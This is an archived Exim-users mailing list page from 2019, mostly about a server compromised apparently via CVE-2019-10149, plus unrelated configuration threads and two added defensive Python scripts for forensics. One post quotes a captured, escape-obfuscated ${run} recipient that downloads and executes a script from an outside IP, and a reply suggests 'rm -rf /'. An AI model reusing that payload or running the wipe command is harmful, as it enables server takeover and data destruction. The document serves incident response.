Re: [exim] just been hacked, could be CVE-2019-10149?

2019-06-19 Thread Calum Mackay via Exim-users

Thanks Marius,

Yes indeed, no argument at all. I've been involved in UNIX security for 
30 years (and so should have known better anyway).


Luckily, in this case, the script-kiddies' efforts seem naive, and they 
weren't even able to succeed in opening up SSH access, despite having 
root and attempting it.


They made some effort to change mtimes of files changed, but forgot, or 
weren't able, to also change inode ctimes, so those were, at least, 
easily found.


It's not likely all that was a charade, hiding some more sophisticated 
hacking but, as you say, it's impossible to be sure.


good points!

cheers,
calum.

On 19/06/2019 6:50 pm, Cyborg via Exim-users wrote:

On 11.06.19 at 19:34, Calum Mackay via Exim-users wrote:

I'm still catching up, but…

On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:

Why didn't you harden your exim with the "allowed chars" change we
posted here on the list, or did you?


Is that still necessary/advised, now I'm running 4.92?



rm -rf /
reboot from usb drive
reinstall modern ShortCycle OSes like Fedora

Why?

Because your server got hacked with root access and you have no idea
what the attacker did and what you did not find.
Attackers can change your logfiles to remove or correct their
activities as they like, install hypervisor rootkits etc. etc.

Trust the IT forensics guys: you can only be sure if you cold start the
server and boot from a trustworthy medium
to do forensics on a system.


best regards,
Marius
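
The mtime/ctime mismatch Calum used to spot the altered files can be turned into a sweep. This is an added example, not code from the thread: it walks a tree and reports files whose inode ctime (which user space cannot set) is far from the mtime; the demo directory, file names and threshold are constructed here.

```python
import os
import tempfile
import time


def timestamp_gap(path):
    """Seconds by which the inode change time (ctime) leads the content
    modification time (mtime). utime()/touch can set mtime to any value,
    but the kernel then bumps ctime to 'now', so a large gap is the trace
    left by a rewritten-then-backdated file. Unix semantics only: on
    Windows st_ctime is the creation time instead."""
    st = os.lstat(path)
    return st.st_ctime - st.st_mtime


def find_timestomped(root, threshold=3600):
    """Walk root and return [(path, gap_seconds)] for files whose |gap|
    exceeds threshold. Either direction is abnormal for a file written in
    place: mtime far behind ctime means it was backdated, mtime ahead of
    ctime means a future time was forced."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                gap = timestamp_gap(path)
            except OSError:  # vanished or unreadable: skip, don't abort the sweep
                continue
            if abs(gap) > threshold:
                hits.append((path, gap))
    return sorted(hits)


def run_demo():
    """Constructed tree: one file left alone, one whose mtime is pushed back
    a year the way an intruder 'restores' a timestamp after editing.
    Returns [(basename, rounded_gap)] as find_timestomped() sees it."""
    with tempfile.TemporaryDirectory() as root:
        honest = os.path.join(root, "honest.conf")
        stomped = os.path.join(root, "stomped.sh")
        for p in (honest, stomped):
            with open(p, "w") as fh:
                fh.write("# constructed sample content\n")
        year_ago = time.time() - 365 * 86400
        os.utime(stomped, (year_ago, year_ago))  # mtime lies; ctime is still 'now'
        return [(os.path.basename(p), round(gap))
                for p, gap in find_timestomped(root)]


if __name__ == "__main__":
    for name, gap in run_demo():
        print(f"{name}: ctime leads mtime by {gap} s")
```

Files unpacked from tar or copied with rsync -t show the same signature (old mtime, fresh ctime), so triage hits against package checksums (dpkg -V, rpm -V) rather than treating every one as tampering.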






--
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] just been hacked, could be CVE-2019-10149?

2019-06-19 Thread Calum Mackay via Exim-users

thanks Heiko, yes, good point re unstable.

In this case, the fix /was/ available in unstable, but a few other 
issues with updating had led to a delay, on that system, which proved 
unfortunate.


thanks,
calum.

On 19/06/2019 12:47 pm, Heiko Schlittermann via Exim-users wrote:

Calum Mackay via Exim-users (Tue 11 Jun 2019 01:39:22 CEST):

My mail system has just been hacked; it's running Debian unstable exim
4.91-9


I just checked https://packages.debian.org/unstable/mail/, and they list
4.92-8 there. So your 4.91 seems to be outdated a bit.

But generally speaking, I wouldn't rely on the same speed in fixing
critical issues for unstable releases as I'd expect for stable
releases. So, running an unstable release you're somewhat on your own.


Could it be CVE-2019-10149? I don't see any reports of active exploits yet.


Yes, it could be.


ought I to be reporting this anywhere?


Not sure. The issue is well known meanwhile. And some distros already
supplied fixed packages or stated that they run very outdated (<4.87)
Exim versions and are not vulnerable for this reason.

 Best regards from Dresden/Germany
 Kind regards from Dresden
 Heiko Schlittermann
--
  SCHLITTERMANN.de  internet & unix support -
  Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
  gnupg encrypted messages are welcome --- key ID: F69376CE -
  ! key id 7CBF764A and 972EAC9F are revoked since 2015-01  -






Re: [exim] just been hacked, could be CVE-2019-10149?

2019-06-19 Thread Calum Mackay via Exim-users

Interesting point, thanks Jan.

No external users/customers on this system, fortunately. If there were, 
or it had anything sensitive anywhere near it, I'd not have been running 
unstable on it, and it would have been updated much more frequently.


thanks,
calum.


On 19/06/2019 3:18 pm, Jan Ingvoldstad via Exim-users wrote:

On Wed, Jun 19, 2019 at 1:26 PM Calum Mackay via Exim-users <exim-users@exim.org> wrote:



Luckily, it looks like the trojans did nothing more than repeated
attempts to open up my ssh server to root logins, which I think (and
hope) didn't actually work, so I may have been lucky, and the damage
isn't widespread.


ought I to be reporting this anywhere?



As this puts the metadata and content of emails transmitted through your
server at risk, as well as any authenticated user/customer login details
(passwords, too), if you are operating within the EEA, you are bound by the
GDPR and probably have a duty to alert any affected and potentially
affected users/customers about the breach and what kind of data is astray,
etc.





Re: [exim] exim and utf8

2019-06-19 Thread Randy Bush via Exim-users
and the answer is 

smtputf8_advertise_hosts =

randy



Re: [exim] just been hacked, could be CVE-2019-10149?

2019-06-19 Thread Cyborg via Exim-users
On 11.06.19 at 19:34, Calum Mackay via Exim-users wrote:
> I'm still catching up, but…
>
> On 11/06/2019 7:43 am, Marius Schwarz via Exim-users wrote:
>> Why didn't you harden your exim with the "allowed chars" change we
>> posted here on the list, or did you?
>
> Is that still necessary/advised, now I'm running 4.92?


rm -rf /
reboot from usb drive
reinstall modern ShortCycle OSes like Fedora

Why?

Because your server got hacked with root access and you have no idea
what the attacker did and what you did not find.
Attackers can change your logfiles to remove or correct their
activities as they like, install hypervisor rootkits etc. etc.

Trust the IT forensics guys: you can only be sure if you cold start the
server and boot from a trustworthy medium
to do forensics on a system.


best regards,
Marius






Re: [exim] just been hacked, could be CVE-2019-10149?

2019-06-19 Thread Jan Ingvoldstad via Exim-users
On Wed, Jun 19, 2019 at 1:26 PM Calum Mackay via Exim-users <exim-users@exim.org> wrote:


> Luckily, it looks like the trojans did nothing more than repeated
> attempts to open up my ssh server to root logins, which I think (and
> hope) didn't actually work, so I may have been lucky, and the damage
> isn't widespread.
>
>
> ought I to be reporting this anywhere?
>
>
As this puts the metadata and content of emails transmitted through your
server at risk, as well as any authenticated user/customer login details
(passwords, too), if you are operating within the EEA, you are bound by the
GDPR and probably have a duty to alert any affected and potentially
affected users/customers about the breach and what kind of data is astray,
etc.
-- 
Jan


Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

2019-06-19 Thread Heiko Schlittermann via Exim-users
Russell King via Exim-users (Tue 11 Jun 2019 16:08:28 CEST):
>
> As I stated in my original post, I've tried substituting the " " with
> both + and %2b.  I was using Firefox, I've also used elinks as well.
> Nothing works to get a commitdiff.
>
> >https://git.exim.org/exim.git/shortlog/refs/heads/exim-4_91%2Bfixes
>
> That URL is not a problem - getting the shortlog is not a problem.
> Following any of the links from the shortlog _is_ a problem as my
> original post stated.

Hm. Starting with the link you describe here (using %2B) I can follow
many, if not all (didn't test *all*) links; shortlog -> commitdiff
works.

Using Chromium.
--
Heiko




Re: [exim] Auto-bcc certain outgoing mail?

2019-06-19 Thread Dmitriy Matrosov via Exim-users



On June 14, 2019 10:07:40 PM GMT+03:00, Aki Kyo via Exim-users wrote:
>Hello, can someone help guide me what the best way is to grab copies
>of one of our users outgoing mails and bcc to another address?
>
>Thank you

You could probably use an IMAP/POP3 server to share access to the mailbox instead of 
doing a bcc, like https://wiki.dovecot.org/SharedMailboxes .
Shared mailboxes may have a separate "read" flag, and sharing may be done 
invisibly to the main user.



Re: [exim] Unix domain socket for redis_servers

2019-06-19 Thread Jeremy Harris via Exim-users
On 12/06/2019 19:32, Yevgeny Kosarzhevsky via Exim-users wrote:
> could someone enlighten me what is the proper syntax for redis_servers
> to use unix domain socket?

http://exim.org/exim-html-current/doc/html/spec_html/ch-file_and_database_lookups.html
 :-

 If specified, the option must be set to a colon-separated list of
 server information. Each item in the list is a slash-separated list of
 three items: host, database number, and password.

The host is required and may be either an IPv4 address and optional
port number (separated by a colon, which needs doubling due to the
higher-level list), or a Unix socket pathname enclosed in
parentheses.


-- 
Cheers,
  Jeremy



Re: [exim] Blackhole messages from pre-defined domains

2019-06-19 Thread Jeremy Harris via Exim-users
On 11/06/2019 16:17, J Group via Exim-users wrote:
> However, when I did this, the rules stopped working and messages from blocked 
> domains were allowed through.

Test using -bh -d+all mode.  Where is the decision point where it takes
a wrong path?

-- 
Cheers,
  Jeremy



Re: [exim] just been hacked, could be CVE-2019-10149?

2019-06-19 Thread Heiko Schlittermann via Exim-users
Calum Mackay via Exim-users (Tue 11 Jun 2019 01:39:22 CEST):
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9

I just checked https://packages.debian.org/unstable/mail/, and they list
4.92-8 there. So your 4.91 seems to be outdated a bit.

But generally speaking, I wouldn't rely on the same speed in fixing
critical issues for unstable releases as I'd expect for stable
releases. So, running an unstable release you're somewhat on your own.

> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.

Yes, it could be.
>
> ought I to be reporting this anywhere?

Not sure. The issue is well known meanwhile. And some distros already
supplied fixed packages or stated that they run very outdated (<4.87)
Exim versions and are not vulnerable for this reason.

Best regards from Dresden/Germany
Kind regards from Dresden
Heiko Schlittermann
--
 SCHLITTERMANN.de  internet & unix support -
 Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
 gnupg encrypted messages are welcome --- key ID: F69376CE -
 ! key id 7CBF764A and 972EAC9F are revoked since 2015-01  -




Re: [exim] Auto-bcc certain outgoing mail?

2019-06-19 Thread Kathy Sechrist via Exim-users
I accomplished this (ymmv) by creating a new file with the following, 
and saving it to

/usr/local/cpanel/etc/exim/sysfilter/options

# Exim filter
# Copy this user's outgoing mail to a second address on the first delivery
# attempt only (so a retried message is not copied twice), skipping messages
# that SpamAssassin has already stamped with an X-Spam-Checker-Version header.
if first_delivery
and ("$sender_address:" contains "us...@example.com")
and not ("$h_X-Spam-Checker-Version:" begins "SpamAssassin")
then
# "unseen" leaves the normal delivery untouched and only adds the copy
unseen deliver "us...@example.com"
endif

I then enabled this filter through WHM > Exim Configuration Manager > 
Filters


(FYI I tried several versions of this file before landing on this one 
that works well. YMMV.)


Be warned - the additional recipient will receive a copy of the outgoing 
email with no changes, so it will appear as if it had been sent directly 
to them unless they look at the TO field. I suggest copying the emails 
to a separate account set up explicitly for the purpose of receiving 
copies to prevent unintentional replies/read receipts to the copied mail.



On 6/14/2019 2:07 PM, Aki Kyo wrote:

Hello, can someone help guide me what the best way is to grab copies
of one of our users outgoing mails and bcc to another address?

Thank you





[exim] Exim Exploit CVE-2019-10149

2019-06-19 Thread Gordon Dickens via Exim-users

Hello Everybody,

Please be aware of Exim Exploit CVE-2019-10149.

https://www.zdnet.com/article/exim-email-servers-are-now-under-attack/

Everyone should update to Exim version 4.92 ASAP, or to whatever version 
for your OS includes the fix for CVE-2019-10149.


For example, for Debian the fix is included in exim4 version 4.89-2+deb9u4.

FYI,

Gordon




Re: [exim] DKIM signing table

2019-06-19 Thread Bjoern Franke via Exim-users
Hi Jasen,

> 
> or you could just put the selector in another file.
> something like
> 
> dkim_selector=${if 
> exist{DKIM_DOMAIN.sel}{${readfile{DKIM_DOMAIN.sel}}}{default_selector}}

Great, thanks for the hint.

Best regards
Bjoern




[exim] just been hacked, could be CVE-2019-10149?

2019-06-19 Thread Calum Mackay via Exim-users

hi all,

My mail system has just been hacked; it's running Debian unstable exim 
4.91-9


Could it be CVE-2019-10149? I don't see any reports of active exploits yet.

The reasons I suspect exim involvement:

• starting today, every 5 mins I'm getting frozen messages:

The following address(es) have yet to be delivered:

root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx: 
Too many "Received" headers - suspected mail loop


• the trojan horse scripts that were successfully installed on my 
system, with root access, are all group Debian-exim



Luckily, it looks like the trojans did nothing more than repeated 
attempts to open up my ssh server to root logins, which I think (and 
hope) didn't actually work, so I may have been lucky, and the damage 
isn't widespread.



ought I to be reporting this anywhere?


thanks,
calum.
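
The recipient in that frozen-message notice carries an Exim string expansion in its local part, with the command hidden behind \xHH escapes. As an added example (not code from the thread), this flags such recipients in free-form text such as a queue listing or bounce notice and decodes the escapes so an analyst can read what was attempted. The sample notice is constructed and its embedded command is a harmless placeholder.

```python
import re

# Backslash escapes as Exim's string expander reads them inside a ${...}
# item: \xHH (hex), \NNN (octal), \n \r \t, and \<c> for a literal <c>.
_ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)", re.S)
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t"}


def decode_exim_escapes(text):
    """Turn escape-obfuscated expansion text back into readable form."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8))
        return _SIMPLE.get(m.group(3), m.group(3))
    return _ESCAPE_RE.sub(repl, text)


def inspect_recipient(address):
    """Return (suspicious, decoded_local_part). No legitimate mailbox name
    contains '${', so its presence in the local part is the signal; the
    decoded form is for the incident write-up, not for re-execution."""
    local = address.rpartition("@")[0]
    if "${" not in local:
        return False, local
    return True, decode_exim_escapes(local)


# Anything shaped like local@domain in free text; local parts in these
# notices may hold $ { } \ + but never white space or a second '@'.
_RECIPIENT_RE = re.compile(r"[^\s<>@,]+@[\w.-]+")


def scan_text(text):
    """Return [(raw_address, decoded_local_part)] for every suspicious
    recipient found in text."""
    hits = []
    for m in _RECIPIENT_RE.finditer(text):
        suspicious, decoded = inspect_recipient(m.group(0))
        if suspicious:
            hits.append((m.group(0), decoded))
    return hits


# Constructed sample in the shape of the frozen-message notice above; the
# command inside the expansion is a placeholder, not the one from the post.
SAMPLE_NOTICE = r"""The following address(es) have yet to be delivered:

root+${run{\x2fbin\x2fecho\x20hello\x20world}}@mail.example.invalid:
Too many "Received" headers - suspected mail loop
alice@mail.example.invalid: retry timeout exceeded
"""

if __name__ == "__main__":
    for raw, decoded in scan_text(SAMPLE_NOTICE):
        print("suspicious recipient:", raw)
        print("  local part decodes to:", decoded)
```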



[exim] Unix domain socket for redis_servers

2019-06-19 Thread Yevgeny Kosarzhevsky via Exim-users
Hello,

could someone enlighten me what is the proper syntax for redis_servers
to use unix domain socket?
Thanks!

-- 
Regards,
Yevgeny



[exim] Blackhole messages from pre-defined domains

2019-06-19 Thread J Group via Exim-users
Hello everyone,

I was hoping someone might be able to help me with this one. I have followed 
this guide on setting up a list of blocked domains on our WHM system: 
https://www.hostingmatters.co.uk/support/help-guides/86-server-management 


Ideally I would like to blackhole the messages rather than send a reply stating 
that the sender’s address is blocked. To do this, I changed the code from:
# Inserted to block domains access
# Local from blacklist: /etc/eximblacklist
reject_domains:
driver = redirect
# RBL Blacklist incoming hosts
domains = +eximblacklist
allow_fail
data = :fail: Connection rejected: $domain is manually blacklisted.

To this code:

# Inserted to block domains access
# Local from blacklist: /etc/eximblacklist
reject_domains:
driver = redirect
# RBL Blacklist incoming hosts
domains = +eximblacklist
allow_fail
data = :blackhole:

However, when I did this, the rules stopped working and messages from blocked 
domains were allowed through.

Can someone help me modify the code so that instead of a sender receiving a 
return message, their messages are just blackholed instead?

Kind regards


James



Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

2019-06-19 Thread Russell King via Exim-users
On Tue, Jun 11, 2019 at 03:42:09PM +0200, Heiko Schlittermann via Exim-users wrote:
> Hi,
> 
> Russell King (Tue 11 Jun 2019 15:33:47 CEST):
> > Hi,
> >
> > While looking for the fix on the web version of git.exim.org, I find that
> > although I can get a listing based on the branch, I'm unable to get commit
> > or commitdiffs.
> >
> > For example, the page at:
> >
> >   https://git.exim.org/exim.git/shortlog/refs/heads/exim-4_91+fixes
> >
> > gives links such as:
> >
> > commit 
> > | commitdiff
> 
> The behaviour you describe seems to depend on the browser. FF is
> reported to work, while Chromium doesn't. Probably this varies with the
> versions.

I think you've misunderstood my email.  Please look carefully at those
links I've quoted...

> If in the above URL you substitute + by %2B, it works. I'm not sure if
> this is gitweb's fault. But gitweb could easily avoid this issue by not
> using unescaped plus signs.

As I stated in my original post, I've tried substituting the " " with
both + and %2b.  I was using Firefox, I've also used elinks as well.
Nothing works to get a commitdiff.

>https://git.exim.org/exim.git/shortlog/refs/heads/exim-4_91%2Bfixes

That URL is not a problem - getting the shortlog is not a problem.
Following any of the links from the shortlog _is_ a problem as my
original post stated.

-- 
Russell King



Re: [exim] exim and utf8

2019-06-19 Thread Jeremy Harris via Exim-users
On 19/06/2019 00:40, Randy Bush via Exim-users wrote:
> did the fix for the recent vuln possibly cause this?
> 
> this is exim forwarding to exim
> Exim version 4.92 #4 (FreeBSD 11.2) built 25-May-2019 01:19:44
> to
> Exim version 4.90_1 #4 built 04-Jun-2019 18:44:51
> 
> any thing i can do to ameliorate?  
> 
> randy
> 
> 2019-06-18 22:54:35 1hdMzr-000ESq-8e <= 
> bounce+e0fe98.5e6ef-randy=psg@notify.docker.com 
> H=(mail-182-80.mailgun.info) [23.253.182.80] P=utf8esmtps 
> X=TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128 CV=no S=4623 DKIM=notify.docker.com 
> id=20190618225434.73328.89257@7bfeb10228df
> 2019-06-18 23:02:58 1hdMzr-000ESq-8e H=test.psg.com [2001:418:8006::18]: utf8 
> support required but not offered for forwarding

Possibly indirectly, if the newer build included utf8 support and the
older did not.

You could:

- ask the sender if they really needed to use SMTPUTF8, and persuade
them not to if/when it is not needed by the message (actually, looking
at the env-from there, it probably was)
- ask the system you're forwarding to to update to add international
character support
- discover that you shouldn't really have been forwarding that message,
and close an open relay
- investigate the message and discover it was spam anyway
- configure to disable support for international characters on reception

-- 
Cheers,
  Jeremy
